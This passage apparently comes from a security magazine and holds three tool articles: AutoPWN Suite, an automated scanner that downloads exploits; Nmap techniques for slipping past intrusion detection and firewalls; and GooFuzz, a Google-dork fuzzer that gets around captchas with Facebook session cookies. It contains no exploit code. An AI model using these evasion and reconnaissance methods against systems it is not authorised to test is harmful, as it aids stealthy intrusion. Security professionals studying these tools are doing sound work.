businesses fail to recognize the risks their systems face because hackers do not target a single
business or industry in particular; they will attack anyone who does not have adequate security
measures in place. In order to protect your company from these dangers, you need an automated
solution that scans your system for vulnerabilities and exploits them before the hacker can do it first.
Many companies are still in the dark about what is happening around them and how to stop it. This
article discusses the importance of AutoPWN Suite, a tool that scans vulnerabilities and exploits them
automatically so you don’t have to worry about doing it manually.
85
What is AutoPWN Suite?
AutoPWN Suite is a suite of automated tools developed by me, a cyber security researcher. It is
designed to help companies and individuals protect against cyber threats automatically and efficiently
via an online threat detection and response system. AutoPWN Suite automates the process of scanning
and finding security issues in computer systems. It is a solution that automatically scans, detects, and
exploits all known vulnerabilities in your system without any manual intervention. It is a fully automated
penetration testing tool that helps you find hidden security holes in your system and fix them before a
hacker can take advantage of them. With this solution, you do not have to spend time or effort to scan
your system for vulnerabilities or attempt to fix them manually. Instead, you can simply let AutoPWN
Suite do the work for you so you can focus on more important things. AutoPWN Suite solution is ideal
for businesses of all sizes because it can be used to test any type of system, including web
applications, databases, and networks.
When you start out in penetration testing, one of the first things you learn is how to scan the target host
with nmap to find information about software running on the target with additional details like version.
Then you use this information to search known vulnerabilities. This is usually done by using either
Google search or a built-in tool in Kali Linux, Searchsploit. So my goal was to automate this process.
86
AutoPWN Suite: What’s in it?
AutoPWN Suite consists of the following tools: An nmap scanner, for scanning the network and
detecting live hosts on the target network to enumerate the services running on them with additional
information, such as their versions, in order to use it for vulnerability detection; a keyword generator -
after scanning the host, AutoPWN Suite uses a basic algorithm to generate keywords automatically to
use for searching for vulnerabilities later on; vulnerability searcher - this module uses NIST Database
API to search known vulnerabilities from the keywords generated from the previous step via "keyword
generator", parsing and saving the results for later use; exploit downloader, as the cherry on top - while
we are at it, why not automate the process of downloading exploits too? This tool does exactly that.
Using the results from NIST Database API, it searches the ExploitDB and automatically downloads the
corresponding exploits, using the CVE IDs; reporter - this is the module that generates a scan report for
you. For now, this module can generate reports in TXT, HTML and SVG format. It can also send the
generated report via webhook or email automatically, just to make your job easier.
AutoPWN Suite can be very helpful when it comes to uncovering security issues in your network. It can
help you discover weaknesses and issues in the security of networks or servers you are connected to.
You can also use it to check if any of your systems are vulnerable to known exploits or attacks. If you
use the AutoPWN Suite on a daily basis, you will start to notice a difference in the quality of your work
and your team’s ability to detect issues. Since AutoPWN Suite is a really extensive tool, it can be used
in a wide variety of operations, like testing from singular hosts to entire networks, web servers, routers
or even IOT devices.
The more vulnerabilities your system has, the easier it is for a hacker to gain access to it. This means
you need to be careful about the security of your system and how it is configured, or you could
accidentally leave your systems open to malicious attacks. One of the best ways to protect your
systems from these threats is by using AutoPWN Suite. Here are some of the reasons why you should
use AutoPWN to protect your systems from hackers. - Quick and Easy Testing - All you have to do is
enter in a few details about your system, and AutoPWN Suite will automatically detect vulnerabilities in
87
your system and exploit them before a hacker can take advantage of them. - No Technical Skills
Required - Anyone can use it to scan their system for vulnerabilities, it doesn't really require knowledge
in penetration testing or any other cyber security concepts. - Automatic Reporting - Another benefit of
AutoPWN Suite is that it can automatically generate a report with the information, such as
vulnerabilities, that were found in your system. You can then use this information to fix the issues within
your system.
In conclusion: AutoPWN Suite uses nmap TCP-SYN scan to enumerate the host and detect the version
of software programs running on it. After gathering enough information about the host, AutoPWN Suite
uses a basic algorithm to automatically generate a list of "keywords" in order to use them for searching
the NIST vulnerability database. Then, it uses the results it gets from the NIST database to search
ExploitDB for known exploits, using CVE IDs. To elaborate a little more, we need to categorize the
scanning process.
Pre-Scanning Process
Before starting, we need a few pieces of information, such as the target. If the user decides to use
automatic mode and not specify any targets, AutoPWN Suite will try to automatically detect the target
network. This is done by first detecting the network interface that is actively being used. After finding
out the interface and its IP address, AutoPWN Suite attempts to detect the target network range.
In this process, AutoPWN Suite first sends packets to every host in the target range to detect live hosts.
After discovering hosts that are live, these hosts are scanned for open ports and software running on
them.
With the information gathered from the previous step, a basic algorithm is being used to generate a list
of “keywords” to search the NIST database. This process is almost as simple as just concatenating the
software name with its version.
88
After generating the keywords, these keywords are being used to make a request to the NIST
vulnerability database API. If the API returns adequate results, these results are parsed and displayed
on the user interface. They are also saved for later use.
Using the information from the previous step, we can now make a request to ExploitDB. By passing the
"X-Requested-With": "XMLHttpRequest" request headers, the ExploitDB endpoint can be used
like an API. If the endpoint returns a known exploit or exploits, that exploit is automatically downloaded
to the “exploits/Software Name/CVE ID/” folder.
If the target is running a website, that site is being crawled. When AutoPWN Suite gets a list of
endpoints on the website that can be used, it looks for parameters and tests them for local file
inclusion, SQL injection and cross site scripting vulnerabilities. It also does “dirbusting” to find
endpoints that might be interesting.
One of the main goals behind AutoPWN Suite was to make it as easy to use as possible to make it an
accessible tool to anyone. After successfully installing AutoPWN Suite, you can run the program and
pass it the -y flag to run it in order to use fully automatic mode. It is recommended to use AutoPWN
Suite in this mode since it's the intended way of using it. If you don't specify the -y flag, AutoPWN Suite
will ask you a few questions in order to start scanning, such as the target, if you would like to scan for
vulnerabilities, if you would like to automatically download corresponding exploits and if you would like
to do web application-based vulnerability analysis. It will also ask you which hosts to scan further after
doing host discovery, in case you want to only scan a specific host or hosts rather than the entire
network.
89
Customizing the scan
If you want to tinker with the settings of your scan, you can do that too. Here are some of the options.
These options might be really handy in different situations and environments.
• Specify a target: -t
90
Automatic reporting
AutoPWN Suite can also do automatic reporting. You will need to use the -rp flag to specify which
reporting method you want to use.
In order to send the scan report with email you need to specify a few options.
In order to set
In order to send the scan report with webhook, you only need to specify a webhook link to use for
sending the report with -rpw flag.
91
Conclusion
Cyber security is a growing concern in the modern world. The number of reported cyber attacks is
increasing year-on-year, and the number of those that remain unsolved is also rising. The Internet is full
of malicious threats that you need to protect your systems from. Moreover, this trend is expected to
continue, as cyber security professionals are still not well enough equipped to deal with these attacks.
This is why it is important to use solutions like AutoPWN Suite that automatically scans for
vulnerabilities in your system and exploits them before a hacker can do it first. With this solution, you
do not have to spend time or effort scanning your system for vulnerabilities manually; you can simply let
AutoPWN do the work for you.
Kaan Gültekin
I am a young cyber security researcher and software developer. Here are some of my achievements.
• I was 1st in Turkey and 11th in the all countries on TryHackMe amongst more than 1 million people.
• A vulnerability scanner I've created in less than a month got shared by hundreds of people on Twitter
and starred around 500 times.
• I've created a fileless fully undetectable malware that has more features than meterpreter in
PowerShell with no knowledge in PowerShell and networking before.
92
Nmap: The indispensable
by Jafar Untar
What is Nmap?
Nmap is, in a straightforward way, the best tool on the scanning stage of a pentesting process, period.
Just explaining a little bit, the “Network Mapping” is a tool created a while ago and released in 1997 by
Gordon “Fyodor” Lyon, with the intent of being an open-source security scanner with “consistent
interface and efficient implementation of all practical port scanning techniques”. As the time passed by,
Nmap became a complex and powerful Swiss-army-knife with plenty of new features, such as OS
fingerprint discovery, custom scripts for detection, and various parameters for evading filters and
firewalls, with different output modes, and it is very versatile to automate and build its own scripts. The
program also has a GUI version entitled Zenmap.
Throughout the process of a black box pentesting, the chances of already having the info of the
infrastructure of the target via previous stages, such as OSINT, is low, so there is the need to discover it
via network scanning, and there are a lot of techniques involved in this problem. Since the lack of
information could lead to being blocked or detected by the target while executing a simple scan, the
recommendation is to use evasion methods to bypass possible protection methods and avoid
appearing to the defense team. There are a variety of ways on Nmap to perform these actions and we
will talk briefly about them; they allow us to perform scans in some networks with IDS without being
detected or blocked by the IPS, and make it possible to succeed in the detection of services at the
host, since these techniques could evade both firewalls and detection systems.
2. The packet path through the internet to reach the target in an example of IDS implementation
93
Taking a closer look at a basic scan, e.g., “nmap -v -sV somehost.com”, the initial action by Nmap is to
choose a random exit port and start sending packets and the probes to scan the service version, but
sometimes the host won’t accept the request if a specific port is not the source. So, if we add the “-g
[PORT]” or “—source-port [PORT]” parameter, it’s possible to change the origin port for the scan, and
evading some control that, for example, allows only SSH (port 22) connections and are open to all
connections in that port. Packet fragmentation is also a method used to sneak through detection
systems and filters, splitting TCP headers into parts, allowing them to all reach the target without being
detected at first, although this option could be difficult to handle by some programs, the “-f” option is
still a valid option to bypass signature-based IDS.
3. Signature-based IDS
The “-sS” SYN scan is a very common and popular one, but thinking simply about common filters,
some of them already block SYN packets. Using the “-sA” scan type would perform a scan sending
SYN ACK packets, which could pass, and this mindset should be applied when using Nmap, thinking
that the target may always have a firewall or some type of detection system, leading us to the variety of
scan methods available. A tip is to always (except in rare cases) use the “–open” parameter to clean the
output to open ports only and output the scan. The OS detection scan would send a lot of TCP, UDP
and ICMP probes to the target and analyze its result, comparing with the responses in a database with
more than 2,600 operational system fingerprints enumerated and then bringing the actual guess.
Even though it’s a common understanding, it’s valid to also mention the “-T” parameter that (roughly
saying) changes the frequency of packets being sent, and changing up to five different rates, with 0
being extremely quiet and slow and 5 being the fastest (and 3 being default), is possible to evade some
detection systems and be less evident on the target network, which will be the opposite if you are trying
to scan an enormous range of IPs, changing the stealth in place of fast execution and packet dithering.
One thing to mention is that sometimes the -T 5 would be so fast that the ISP automatically blocks the
scan, so the -T 4 should be a reasonable increase in the speed. The -Pn option would skip all ping
probes since many filters already block ICMP packets, and this parameter will consider all hosts as
active and proceed with the scan.
In the given example, the free TryHackMe CTF platform room called “idsevasion” is shown, which was
made to teach basic concepts of IDS evasion through a lab with a detection system implemented. As it
is possible to see, when scanning using only SYN scan, the IDS does not trigger any alerts at all, even
though it does not bring complete information, the open ports are given. The scan below is a SYN scan
94
to return all open ports between 1 and 1000 port, with maximum timing speed since no block was
detected.
As soon as we switched the scan to a method that uses probes to detect the service version, as
follows, the IDS detected the traffic that was coming from Nmap, and even detected the version
detection probes as coming from Nmap.
95
6. Service version scan (-sV scan) on Nmap
8. IDS Alerts triggered with description of the IDS as Nmap NSE Scripts
In wireless networks, it’s also useful to spoof MAC addresses since some filters are directed to specific
devices, like white filtering, the “–spoof-mac” parameter can handle that, setting a specific address or
a random one to send packets by. The option of spoofing MAC addresses has the option to just put the
name of the vendor’s name, this is often used to spoof router names (e.g., Cisco). One of my favorites
is the use of decoys to mislead the attention and confuse the firewall; with the “-D” option, it is possible
to send a lot of fake packets together with the actual scanning packets and getting a chance for the
correct packet to pass while the decoys are being filtered, since the filter will be busy analyzing all of
them. You have the option to let Nmap randomize the addresses for those decoys or set it manually.
Turning to privacy and anonymity, you should be concerned about using some resources to be more
invisible when using Nmap, since the program normally shoots a lot of packets to produce its results,
maybe you are exposing your source IP too much. Using the “proxychains” utility, it is possible to run
Nmap through a Tor network, in SOCKS4 or SOCKS5 proxy. It will increase security but also reducing a
lot of the speed of the scanning due to all this network nature, so manipulating the performance
parameters of the scan is a must, like setting as the “—min-rtt-timeout” to a bigger number,
increasing the probe timeout to avoid the packet loss of this unreliable network, and limiting its power
with low numbers of “—max-parallelism” and “—max-retries”. These parameters should give
something amiss to the irregular connection through the proxy tunnel, and you will not reveal yourself
easily in that way.
Talking about proxies, there is also a scan technique, using the “-b” option, that relies on the FTP
feature of serving as a proxy connection, abusing the fact that sometimes the FTP server has more
permissions than usual inside the network. This feature would use the file-transfer-protocol to send files
to a specific port, returning a response if that specific port is open or not. Even if this is a very well
known vulnerability (since 1997), there is always a vulnerable server, and using the ftp-bounce NSE
script, we could detect systems that are able to be exploited in this way. This leads us to one of the
most powerful features of Nmap, the Nmap Scripting Engine (NSE).
97
10. Example of NSE Script (http-vuln-cve2014-2126.nse)
11. Nmap ftp-anon script run detecting the possibility of FTP authentication. TryHackme “furthernmap” room
Nmap brings on a lot of different modules for programming NSE scripts, covering a lot of protocols and
RFCs, making it possible to adapt complex POCs and build exploits to run together with the network
scanning, since the results of an analysis can be used as parameters for the scripting engine through a
robust API. It’s also possible to use parallelism, multithreading and mutex functions to develop multiple
concurrent executions through LUA coroutines. For those who want to receive raw packets, the Libcap
that comes inside the Nsock library allows you to handle a packet listener and customize the reception
of them, and even if you want to send low level packets, such as Ethernet packets, you could use the
nmap.new_dnet function, for example, used by the sniffer-detect script and the Idle Scan.
Conclusion
This tool covers basically the entire reconnaissance stage and, with the availability of settings that you
can use to build a complete network scan and even a vulnerability assessment, Nmap has never been
out of my toolkit. In fact, I’m still learning about it, because since it is a tool, every day you discover
some different usage for it. Even with the existence of specific tools, such as Masscan, designed to
focus on extremely large networks, with proper configuration as shown, changing parallelism levels and
running multiple instances of Nmap, it is possible to have similar results and performance.
With that in mind, when searching for tool functionality and algorithms, the completeness of its
repertoire of techniques, its robust building of probe calculation, congestion controls, scripting and
many more, is clear. The more you can search and discover about this scanning instrument, you find
out why the official book, “Nmap Network Scanning: The Official Nmap Project Guide to Network
Discovery and Security Scanning”, has more than 400 pages, showing that, nowadays, Nmap is still,
indeed, indispensable.
98
About the author
References:
• https://nmap.org/
• https://www.lua.org/
99
GooFuzz - The Power of
Google Dorks
by David Utón Amaya
What would you think if I told you that there are ways to get files and directories from a web server
without leaving any trace on it? This has been the main reason for the creation of GooFuzz, a quick and
easy way to "fuzz" without leaving evidence in web server log files and through advanced Google
search techniques.
GooFuzz is written in Bash and only requires a terminal with Internet access to work. The execution of
the tool is very simple, since it is only necessary to enter a target (URL/IP) and those extensions, file
names, subdomains, folders or parameters that we want to find, either through a dictionary or through
the terminal, separating them by commas.
100
Now, let's see GooFuzz in action, how about listing those office files with ".pdf" extension and backup
files with ".bak" and ".old" extensions. I have added the parameter "-d" (delay) to pause between
requests and decrease the possibility of Google blocking for suspicious activity (captcha).
If you have noticed, I have not specified the number of Google pages ("-p"), I recommend you use this
parameter only for intensive search of subdomains, a file/directory or a relevant extension. This will
save us some unnecessary blocking.
It could also be the case that a larger number of extensions are required to be searched, so the same
command could be reused, but this time passing the path to a file (wordlist).
101
In addition, it is also possible that we only need to list those PDF files that belong only to a main
domain or subdomain in question and we can add the "-x" parameter to exclude those subdomains
that we are not interested in.
On the other hand, GooFuzz can also be used as a fuzzing tool, taking advantage of advanced Google
Dorks techniques and avoiding leaving any trace on the web server.
Let's put GooFuzz back into action; in the following scenario, we will need to enumerate those files,
paths and parameters that are indexed by Google, making use of a small dictionary with relevant paths
and words.
102
As shown in the image above, with GooFuzz we can enumerate subdomains, directories, variables and
files in a single command, achieving "more for less" (more enumeration with fewer requests) and silent,
of course.
In the same way that we saw in the enumeration of files by extensions, we can also use the same
parameter to identify those directories, words or web files separated by commas and without the need
to generate a dictionary.
103
Another new feature that several users have asked us for is the addition of four wordlists where we take
the opportunity to give you tips on how to use them:
• common-extensions.txt: Dictionary with 32 common web extensions, ideal for quick results
together with the "-e" parameter (extensions).
• extensions.txt: Dictionary with almost 900 extensions, this dictionary is for a slow but intensive use
and is intended to be used with the parameter “-b “(byPass) and adding a delay (parameter “-d”)
between 30 and 60 seconds to avoid an abuse of requests per minute.
• words-100.txt: This dictionary is perfect to obtain the most relevant files, paths and variables of a
website. It is highly recommended to use it with a delay between 20 and 30 seconds (parameter "-d")
or if you don't want to wait, you can use it without delay but with the Google captcha avoidance
option (parameter "-b cookies.txt").
• words-1000.txt: This is the most complete dictionary, but not the fastest, so its use is only
recommended together with the "-b" parameter (byPass) and adding a delay (parameter "-d")
between 40 and 60 seconds.
And I forgot! These dictionaries have been chosen from SecLists (thanks for the project!).
In addition, in this version of GooFuzz we have added the functionality to list subdomains (parameter "-
s") and in conjunction with a number of between 10 and 20 pages (parameter "-p"), it is possible to
obtain a large number of subdomains of the organization.
104
One of the drawbacks that we can find is the temporary blocking of Google, this protection occurs (as
in the web version) by the detection of suspicious activity used in the search engine, where we would
have to solve a captcha to continue making requests, an action that can only be performed from a web
browser.
But if we look at the second request, we see that we have used the "-b" parameter, accompanied by a
file containing cookies from a Facebook account and that allows us to launch the requests through a
"developers.facebook.com" functionality and evading the temporary block.
105
Contents of the "cookies.txt" file:
We will have to access the Facebook messaging service with address https://www.messenger.com, we
will authenticate and extract the cookies "c_user" and "xs", then we will create a file "cookies.txt" with
the content and in this format "c_user=<C_USER_COOKIE>; xs=<XS_COOKIE>".
106
By taking advantage of the "ByPass" functionality, we can use a dictionary of 100 words maximum
without being blocked.
https://youtu.be/TyiQTFv4v1w
107
But why do you need my Facebook cookies? Where's the "trick"?
Before explaining what GooFuzz does underneath to perform evasion, let it be clear that this
functionality is optional and does not affect the normal use of the tool, so if you have already used
previous versions, you will not notice any change.
In the following image, a URL of "developers.facebook.com" is shown, where the tool is making a query
to Google from a native tool in Facebook Developer, so the Google captcha does not affect in the same
way as if you were doing it normally or from your web browser (interesting, isn't it?). Of course, to use
this Facebook Developer utility, you have to be authenticated and that is where the use of cookies
comes in.
Also add that the important thing is that while the Facebook session is not closed, cookies will remain
valid, no matter how many computers with GooFuzz you are using.
All these are small examples to get to know the basic operation of the tool, mention that improvements
and new features will be added, so if you like the tool and want to collaborate by proposing new
features or reporting bugs, you are always welcome!
Contact:
David-Uton @David_Uton
108